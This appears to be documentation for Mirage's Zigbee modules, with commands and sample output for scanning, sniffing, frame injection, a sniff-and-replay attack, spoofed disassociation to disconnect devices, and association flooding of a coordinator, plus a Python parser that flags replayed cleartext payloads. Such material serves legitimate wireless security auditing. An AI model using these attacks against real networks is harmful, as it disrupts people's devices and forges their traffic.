List of Zigbee Modules

zigbee_info

Presentation

zigbee_info retrieves information about a given Zigbee interface. It can also list the capabilities of the interface (SHOW_CAPABILITIES parameter).

Compatible devices

Input parameters

INTERFACE: Interface to analyse (default: rzusbstick0; possible values: rzusbstickX|<filename>.pcap)
SHOW_CAPABILITIES: Whether the capabilities of the interface should be displayed (default: yes; possible values: yes|no)

Output parameters

  • If the interface provided is rzusbstickX:
    INTERFACE: Selected interface (possible values: rzusbstickX)
    MODE: Mode currently in use on the selected interface (possible values: NORMAL|JAMMING)
    SERIAL: Device's serial number (possible values: <hexadecimal>)
    FIRMWARE_VERSION: Device's firmware version (possible values: <string>)
    INDEX: Device's index number (possible values: #X)

  • If the interface provided is <filename>.pcap:
    INTERFACE: Selected interface (possible values: <filename>.pcap)
    MODE: Mode in use (possible values: read|write)

Usage

To get complete information about an interface, use the following command:

$ mirage zigbee_info
[INFO] Module zigbee_info loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌─────────────┬──────────────┬───────────────┬──────────────────┬────────┐
│ Interface   │ Device Index │ Serial number │ Firmware Version │ Mode   │
├─────────────┼──────────────┼───────────────┼──────────────────┼────────┤
│ rzusbstick0 │ #0           │ FFFFFFFFFFFF  │ KILLERB001       │ NORMAL │
└─────────────┴──────────────┴───────────────┴──────────────────┴────────┘
[INFO] Mirage process terminated !

zigbee_scan

Presentation

zigbee_scan scans Zigbee channels to discover devices and PanIDs. You can configure the execution time (TIME parameter), the range of channels to scan (START_CHANNEL and END_CHANNEL parameters) and whether the scan is active or passive (ACTIVE parameter).

Compatible devices

Input parameters

INTERFACE: Interface to use (default: rzusbstick0; possible values: rzusbstickX)
START_CHANNEL: First targeted channel (default: 11; possible values: <integer>)
END_CHANNEL: Last targeted channel (default: 26; possible values: <integer>)
TIME: Execution time (default: 10; possible values: <integer>)
ACTIVE: Use active scanning (default: yes; possible values: <boolean>)

Output parameters

  • If no network and no device has been identified, this module generates no output parameters.

  • If only one device is detected, the following output is produced:
    TARGET: Address of the detected device (possible values: <ZigBee address>)
    TARGET_PANID: PanID of the detected device (possible values: <hexadecimal, 2 bytes>)
    CHANNEL: Channel of the detected device (possible values: <channel number>)

  • If several networks and devices are detected, a different set of output parameters is generated, each name suffixed with the index of the network or device it describes:
    NETWORK_PANID1: PanID of the 1st detected network (possible values: <hexadecimal, 2 bytes>)
    NETWORK_CHANNEL1: Channel of the 1st detected network (possible values: <integer>)
    NETWORK_ASSOC_PERMIT1: Whether the 1st detected network accepts associations (possible values: <boolean>)
    NETWORK_COORDINATOR1: Coordinator of the 1st detected network (possible values: <ZigBee address>)
    DEVICE_ADDR1: Address of the 1st detected device (possible values: <ZigBee address>)
    DEVICE_ROLE1: Role of the 1st detected device (possible values: coordinator|end device|router)
    DEVICE_CHANNEL1: Channel of the 1st detected device (possible values: <integer>)
    DEVICE_PANID1: PanID of the 1st detected device (possible values: <hexadecimal, 2 bytes>)
    NETWORK_PANID2: PanID of the 2nd detected network (possible values: <hexadecimal, 2 bytes>)
    NETWORK_CHANNEL2: Channel of the 2nd detected network (possible values: <integer>)
    NETWORK_ASSOC_PERMIT2: Whether the 2nd detected network accepts associations (possible values: <boolean>)
    NETWORK_COORDINATOR2: Coordinator of the 2nd detected network (possible values: <ZigBee address>)
    DEVICE_ADDR2: Address of the 2nd detected device (possible values: <ZigBee address>)
    DEVICE_ROLE2: Role of the 2nd detected device (possible values: coordinator|end device|router)
    DEVICE_CHANNEL2: Channel of the 2nd detected device (possible values: <integer>)
    DEVICE_PANID2: PanID of the 2nd detected device (possible values: <hexadecimal, 2 bytes>)
    ...

Usage

If you want to perform a passive scan, type the following command:

$ mirage zigbee_scan INTERFACE=rzusbstick0 TIME=20 ACTIVE=no
[INFO] Module zigbee_scan loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌────────┬─────────┬───────────────────────┬─────────────────┐
│ Pan ID │ Channel │ Association permitted │ Nodes           │
├────────┼─────────┼───────────────────────┼─────────────────┤
│ 0x3332 │ 12      │ unknown               │ 0x0000(unknown) │
└────────┴─────────┴───────────────────────┴─────────────────┘
[INFO] Mirage process terminated !

An active scan additionally transmits Beacon Request frames and parses the beacons that coordinators answer with; this is why the output below can fill in the association-permitted flag and the node role that the passive scan left as unknown, and also why the target network sees your transmissions. If you want to perform an active scan, type the following command:

$ sudo mirage zigbee_scan INTERFACE=rzusbstick0 TIME=20 ACTIVE=yes
[INFO] Module zigbee_scan loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌────────┬─────────┬───────────────────────┬─────────────────────┐
│ Pan ID │ Channel │ Association permitted │ Nodes               │
├────────┼─────────┼───────────────────────┼─────────────────────┤
│ 0x3332 │ 12      │ no                    │ 0x0000(coordinator) │
└────────┴─────────┴───────────────────────┴─────────────────────┘
[INFO] Mirage process terminated !

zigbee_inject

Presentation

zigbee_inject injects Zigbee frames read from a PCAP file. You can configure the target by channel, PanID and address (CHANNEL, TARGET_PANID and TARGET parameters respectively), the execution time (TIME parameter) and the PCAP file containing the frames to inject (PCAP_FILE parameter).

Compatible devices

Input parameters

INTERFACE: Interface to use (default: rzusbstick0; possible values: rzusbstickX)
TARGET_PANID: Targeted PanID (possible values: <hexadecimal, 2 bytes>)
CHANNEL: Targeted channel (default: 13; possible values: <integer>)
TARGET: Targeted device (possible values: <ZigBee address>)
TIME: Execution time (default: 20; possible values: <integer>)
PCAP_FILE: Capture file from which the frames are read (possible values: <file path>)

Output parameters

This module doesn’t provide any output parameters.

Usage

Basic Usage

To inject a packet stream from a file, for example /tmp/capture.pcap, type the following command:

$ mirage zigbee_inject CHANNEL=12 TARGET_PANID=0x3332 PCAP_FILE=/tmp/capture.pcap
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
^C[INFO] Mirage process terminated !

Performing a replay attack

You can also perform a replay attack by chaining this module with zigbee_sniff: the sniffer records frames to the PCAP file for the configured TIME, then its output parameters (INTERFACE, CHANNEL and PCAP_FILE) are handed to zigbee_inject, which replays the capture on the same channel:

$ mirage "zigbee_sniff|zigbee_inject" zigbee_sniff1.CHANNEL=12 zigbee_sniff1.TARGET_PANID=0x3332 zigbee_sniff1.PCAP_FILE=/tmp/zigbeereplay.pcap zigbee_sniff1.TIME=5
[INFO] Module zigbee_sniff loaded !
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[...]

zigbee_sniff

Presentation

zigbee_sniff passively sniffs ZigBee frames. You can configure the target by channel, PanID and address (CHANNEL, TARGET_PANID and TARGET parameters respectively), the execution time (TIME parameter) and an optional PCAP file in which the capture is saved (PCAP_FILE parameter).

Compatible devices

Input parameters

INTERFACE: Interface to use (default: rzusbstick0; possible values: rzusbstickX)
TARGET_PANID: Targeted PanID (possible values: <hexadecimal, 2 bytes>)
CHANNEL: Targeted channel (default: 13; possible values: <integer>)
TARGET: Targeted device (possible values: <ZigBee address>)
TIME: Execution time (default: 20; possible values: <integer>)
PCAP_FILE: Capture file in which the frames are saved (optional; possible values: <file path>)

Output parameters

INTERFACE: Interface used (possible values: rzusbstickX)
CHANNEL: Channel used (possible values: <integer>)
PCAP_FILE: Capture file (possible values: <file path>)

Usage

Basic Usage

To sniff on a given channel and PanID, type the following command:

$ mirage zigbee_sniff CHANNEL=12 TARGET_PANID=0x3332
[INFO] Module zigbee_sniff loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
^C[INFO] Mirage process terminated !

If you want to export the collected frames to a PCAP file, use the following command:

$ mirage zigbee_sniff CHANNEL=12 TARGET_PANID=0x3332 PCAP_FILE=/tmp/capture.pcap
[INFO] Module zigbee_sniff loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
^C[INFO] Mirage process terminated !

Performing a replay attack

You can also perform a replay attack by chaining this module with zigbee_inject: the sniffer records frames to the PCAP file for the configured TIME, then its output parameters (INTERFACE, CHANNEL and PCAP_FILE) are handed to zigbee_inject, which replays the capture on the same channel:

$ mirage "zigbee_sniff|zigbee_inject" zigbee_sniff1.CHANNEL=12 zigbee_sniff1.TARGET_PANID=0x3332 zigbee_sniff1.PCAP_FILE=/tmp/zigbeereplay.pcap zigbee_sniff1.TIME=5
[INFO] Module zigbee_sniff loaded !
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[...]
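The [PACKET] lines printed by zigbee_sniff are plain text, so a capture can be triaged offline before anything is replayed. The parser below is an added example written for this page, not code from Mirage: it reads zigbee_sniff output, decodes each frame's payload, extracts readable ASCII runs and flags payloads that appear more than once. The sample log is the three frames shown above followed by the same three frames again, a constructed continuation of what the sniffer prints while zigbee_inject replays the capture on the same channel. The field names it returns (ch, rssi, lqi, crc_ok, ...) are this example's own.

```python
import re
from collections import Counter

# One [PACKET] line as zigbee_sniff prints it (format copied from this page's output).
PACKET_RE = re.compile(
    r"\[PACKET\] \[ CH:(?P<ch>\d+)\|RSSI:(?P<rssi>-?\d+)dBm\|LKI:(?P<lki>\d+)/\d+\|CRC:(?P<crc>\w+) \] "
    r"<< (?P<proto>.+?) \| srcAddr = (?P<src>0x[0-9A-Fa-f]+) \| destAddr = (?P<dst>0x[0-9A-Fa-f]+) "
    r"\| destPanID = (?P<pan>0x[0-9A-Fa-f]+) \| data = (?P<data>[0-9A-Fa-f]*) >>"
)

def parse_packet_line(line):
    """Return the fields of a [PACKET] line as a dict, or None for any other line."""
    m = PACKET_RE.search(line)
    if not m:
        return None
    return {
        "ch": int(m["ch"]), "rssi": int(m["rssi"]), "lqi": int(m["lki"]),
        "crc_ok": m["crc"] == "OK", "proto": m["proto"],
        "src": m["src"], "dst": m["dst"], "pan": m["pan"],
        "data": bytes.fromhex(m["data"]),
    }

def printable_runs(data, min_len=4):
    """ASCII runs of at least min_len bytes: cleartext hiding in a payload."""
    runs, cur = [], ""
    for b in data + b"\x00":            # trailing sentinel flushes the last run
        if 0x20 <= b <= 0x7E:
            cur += chr(b)
            continue
        if len(cur) >= min_len:
            runs.append(cur)
        cur = ""
    return runs

def analyse(lines):
    """Summarise a sniffer log: who talks to whom, what is readable, what repeats."""
    pkts = [p for p in map(parse_packet_line, lines) if p]
    payloads = Counter(p["data"] for p in pkts)
    return {
        "frames": len(pkts),
        "bad_crc": sum(1 for p in pkts if not p["crc_ok"]),
        "flows": Counter((p["src"], p["dst"], p["pan"]) for p in pkts),
        "cleartext": sorted({s for p in pkts for s in printable_runs(p["data"])}),
        "replayed": sorted(d.hex() for d, n in payloads.items() if n > 1),
    }

# Constructed sample: the three frames shown on this page, then the same three
# frames again, as the sniffer would see them while zigbee_inject replays them.
SAMPLE_LOG = [
    "[INFO] RZUSBStick: Killerbee firmware in use.",
    "[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>",
    "[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>",
    "[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>",
]
SAMPLE_LOG += SAMPLE_LOG[1:]            # the replay: identical frames seen a second time

if __name__ == "__main__":
    for key, value in analyse(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On this sample the readable runs are "Bonjour" and "Bonjour (bis)p1": the application data travels in the clear and repeats byte for byte, which is exactly why the sniff-then-inject replay above works. A network running 802.15.4 link-layer security with frame counters would reject the second copies as stale; here nothing in the frame changes between the original and the replay.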

zigbee_deauth

Presentation

zigbee_deauth disconnects Zigbee devices by repeatedly sending Disassociation Notification frames. You can configure the targeted PanID (TARGET_PANID parameter), the channel (CHANNEL parameter), the target device (TARGET parameter), the source address written into the frames (SOURCE parameter) and the reason code carried by the Disassociation Notifications (REASON parameter). Unless the network enforces link-layer security, nothing in the 802.15.4 MAC lets the target verify that a Disassociation Notification really came from the address given in SOURCE, which is what makes the spoofed frames effective.

Compatible devices

Input parameters

INTERFACE: Interface to use (default: rzusbstick0; possible values: rzusbstickX)
TARGET_PANID: Targeted PanID (default: 0x1234; possible values: <hexadecimal, 2 bytes>)
CHANNEL: Targeted channel (default: 13; possible values: <integer>)
TARGET: Targeted device (possible values: <ZigBee device address>)
SOURCE: Source address written into the frames (possible values: <ZigBee device address>)
REASON: Disassociation reason ID (default: 1; possible values: <integer>)

Output parameters

This module doesn’t provide any output parameters.

Usage

To disconnect an end device, give its address as TARGET and spoof the coordinator's address as SOURCE:

$ mirage zigbee_deauth CHANNEL=12 TARGET_PANID=0x3332 TARGET=0x13A200403D57B7 SOURCE=0x13A200405DBCFB
[INFO] Module zigbee_deauth loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Target selected: 00:13:A2:00:40:3D:57:B7
[INFO] Source selected: 00:13:A2:00:40:5D:BC:FB
^C[INFO] Mirage process terminated !

By swapping the source and the target, you can also send the frames to the coordinator, as if they came from the end device:

$ mirage zigbee_deauth CHANNEL=12 TARGET_PANID=0x3332 SOURCE=0x13A200403D57B7 TARGET=0x13A200405DBCFB
[INFO] Module zigbee_deauth loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Target selected: 00:13:A2:00:40:5D:BC:FB
[INFO] Source selected: 00:13:A2:00:40:3D:57:B7
^C[INFO] Mirage process terminated !

zigbee_floodassoc

Presentation

zigbee_floodassoc performs an association flooding attack: it repeatedly associates with the targeted coordinator under new addresses, forcing it to allocate resources for devices that will never use them. You can configure the targeted PanID (TARGET_PANID parameter), the targeted channel (CHANNEL parameter) and the targeted coordinator (TARGET parameter).

Compatible devices

Input parameters

INTERFACE: Interface to use (default: rzusbstick0; possible values: rzusbstickX)
TARGET_PANID: Targeted PanID (default: 0x1234; possible values: <hexadecimal, 2 bytes>)
CHANNEL: Targeted channel (default: 13; possible values: <channel number>)
TARGET: Targeted coordinator (possible values: <ZigBee address>)

Output parameters

This module doesn’t provide any output parameters.

Usage

To perform an Association Flooding Attack, type the following command:

$ mirage zigbee_floodassoc CHANNEL=12 TARGET_PANID=0x3332 TARGET=0x13A200405DBCFB
[INFO] Module zigbee_floodassoc loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Coordinator selected: 00:13:A2:00:40:5D:BC:FB
[INFO] New address: 0xC854
[INFO] New address: 0xDCA1
[INFO] New address: 0xAB88
[INFO] New address: 0xFF61
[INFO] New address: 0x03F0
[INFO] New address: 0x0069
[INFO] New address: 0xB07E
[INFO] New address: 0x2004
^C[INFO] Mirage process terminated !